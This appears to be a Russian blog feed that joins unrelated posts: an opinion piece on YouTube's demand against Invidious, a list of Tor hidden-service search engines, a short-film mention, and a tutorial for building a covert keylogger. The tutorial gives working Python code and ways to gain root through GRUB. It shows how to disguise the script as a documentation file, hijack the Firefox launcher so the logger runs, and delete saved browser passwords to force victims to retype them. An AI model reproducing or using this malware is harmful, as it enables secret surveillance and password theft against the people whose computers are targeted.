Разработчики Invidious получили письмо от YouTube с просьбой прекратить распространять свою программу. По мнению юристов YouTube, они нарушают условия использования YouTube API, что впринципе невозможно, так как Invidious не использует YouTube API.

YouTube также утверждает, что Invidious “распространяется на веб-сайте invidious.io”, что также не соответствует действительности, поскольку на этом веб-сайте не размещено ни одного экземпляра Invidious. На сегодняшний день существует порядка 40 веб-сайтов, размещающих у себя публичные экземпляры Invidious, к которыми команда Invidious не имеет никакого отношения, поскольку Invidious использует свободную лицензию AGPL. Даже если бы Invidious считался незаконным ПО в Соединенных Штатах, он скорее всего, был бы размещен и в сети Tor или I2P, что делает практически невозможным попытки прекратить работу сервиса. Кроме того, его код можно найти на нескольких платформах для разработки и на многих компьютерах обычных пользователей.

Invidious не согласился ни с условиями обслуживания API YouTube, ни с условиями обслуживания YouTube. YouTube предоставляет доступ к контенту, размещенному на его серверах, по протоколу HTTP, так что Invidious не совершает преступления; они просто защищают своё право на частную жизнь и свободу.

Google (компания, контролирующая YouTube), с другой стороны, не уважает частную жизнь, занимается цензурой, требует использования проприетарного программного обеспечения, эксплуатирует своих пользователей, разрабатывает программное обеспечение искусственного интеллекта для военных целей, оказывает огромное влияние на экологию, и это лишь несколько примеров. Поэтому есть люди, которые считают, что Google нужно уничтожить.

К счастью, даже если Invidious исчезнет, есть другие свободные проекты, такие как Piped, NewPipe и youtube-dl. Будет ли Google также угрожать разработчикам этих проектов и миллионам их пользователей?

Найти скрытые сервисы для Tor может быть непросто без помощи специальной поисковой системы. К счастью, их существует довольно много. Ссылки на эти поисковые системы работают только для браузеров, которые позволяют получить доступ к скрытым сервисам, например Tor Browser и Brave.

1. Ahmia

Эта поисковая система является свободным программным обеспечением и содержит более 53 000 проиндексированных скрытых сервисов¹. В отличие от других поисковых систем, он не индексирует детскую порнографию².

2. Torch

Эта поисковая система утверждает, что является одной из старейших поисковых системе в глубоком интернете. Torch не стесняется показывать рекламу и индексировать детскую порнографию и другой нелегальный контент.

3. Iceberg

Iceberg индексирует контент всех видов, финансируется за счет рекламы, позволяет индексировать веб-страницы и отображает оценку страницы на основе количества её упоминаний и статистике безопасности пользователей.

4. TorLanD

TorLanD индексирует контент всех видов, финансируется за счет рекламы и позволяет индексировать отдельные веб-страницы.

5. Haystak

Haystak не индексирует контент, который они считают аморальным или незаконным, например, жестокое обращение с детьми и торговлю людьми. Они утверждают, что проиндексировали более 1,5 миллиарда страниц, из 260,000 скрытых сервисов. У них есть адрес для получения пожертвований и возможность оплаты дополнительных функций.

6. OnionLand Search

У OnionLand Search есть страница с правилами и условиями, осуждающая незаконное использование сервиса. Они финансируются с помощью рекламы и предлагают хостинг для скрытых услуг.

7. Ourrealm

Ourrealm финансируется за счет рекламы. Их девиз - «поиск за пределами цензуры».

8. Ondex

Ondex финансируется за счет рекламы и индексирует все типы контента.

9. Deep Search

На главной странице сервиса отображаются трендовые скрытые сервисы. Deep Search индексирует все типы контента и финансируется за счет рекламы.

10. Find Tor

Find Tor индексирует все типы контента, финансируется за счет рекламы и утверждают, что сервис выставлен на продажу.

Другие варианты поиска контента

Существуют и другие списки скрытых сервисов, форумов и т. д. В этой статье перечислены только некоторые из наиболее популярных поисковых систем.

Это видео, загруженное на YouTube с названием Моя луна (Короткометражный фильм созданный в Blender), был снят Ником Продановым в рамках дипломной работы, без привлечения какого либо финансирования и с использованием свободного программного обеспечения. ПО распространяется под лицензией CC BY 4.0.

В этой статье я покажу вам, как сделать продвинутый кейлоггер, который отправляет сообщения по электронной почте и самоуничтожается через определенный промежуток времени.

Простой способ украсть пароли - установить кейлоггер на компьютер жертвы. Я покажу, как это сделать в GNU/Linux с помощью языка программирования Python.

Первое, что нужно сделать, - получить права суперпользователя. Если компьютер находится под нашим управлением, мы уже знаем пароль. Если их нет, мы можем получить права суперпользователя через GRUB. Получив необходимые права, мы можем устанавливать кейлоггер.

Прежде всего, необходимо установить библиотеку pynput, выполнив...

sudo pip install pynput

Далее нам нужно написать кейлоггер. Вот код, который мы будем использовать:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

Журнал ввода с клавиатуры хранится в папке log_dir. В данном случае я указал в качестве назначения папку документации GNU/Linux Python 3. Кейлоггер также можно хранить в том же каталоге, возможно, под именем compile_docs.py или чем-то подобным, чтобы не привлекать внимания. В идеале следует выбрать папку, в которую жертва не собирается заходить, чтобы она не смогла понять, что именно мы делаем.

Следующим шагом будет запуск программы каждый раз, когда компьюте включается или запускается какая-либо программа. Если, например, мы хотим запускать кейлоггер каждый раз, когда пользователь открывает Firefox, мы можем модифицировать команду запуска Firefox. Мы можем переименовать firefox¹ в firefox.bin и создать следующий файл под названием firefox:

python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"

Чтобы узнать, какой именно файл firefox выполняется при нажатии на его значок, перейдите в каталог /usr/share/applications, введите firefox.desktop (или firefox-esr.desktop) и найдите строку, начинающуюся с Exec.

Далее нам следует предоставить права на запись для пользователей, отличных от root, в каталог, где мы будем хранить журнал ввода:

sudo chmod o+w /usr/share/doc/python3

Теперь нужно дождаться, пока жертва воспользуется компьютером, чтобы ввести свои пароли или любую другую информацию, которую мы хотим получить. Журнал ввода будет храниться в файле /usr/share/doc/python3/log. Но будьте осторожны: этот файл может занимать очень много места, особенно, если его не удалять время от времени, поэтому лучше вообще удалить кейлоггер после того, как вы получите нужную вам информацию. Другой вариант - настроить кейлоггер на отправку информации по электронной почте вместо сохранения журнала в файл, что не потребует много места на компьютере жертвы, но этот способ требует использования электронной почты².

Если пароли сохранены в браузере и жертве не нужно вводить их заново, мы можем удалить файл с паролями, чтобы жертва была вынуждена ввести их повторно. В общем, проявив изобретательность, можно получить много информации, особенно если применять этот метод против неопытных пользователей, которые не будут проявлять особых подозрений. А для более опытных пользователей, возможно, лучше скомпилировать программу compile_docs.py с помощью Nuitka, как я показываю в следующей статье.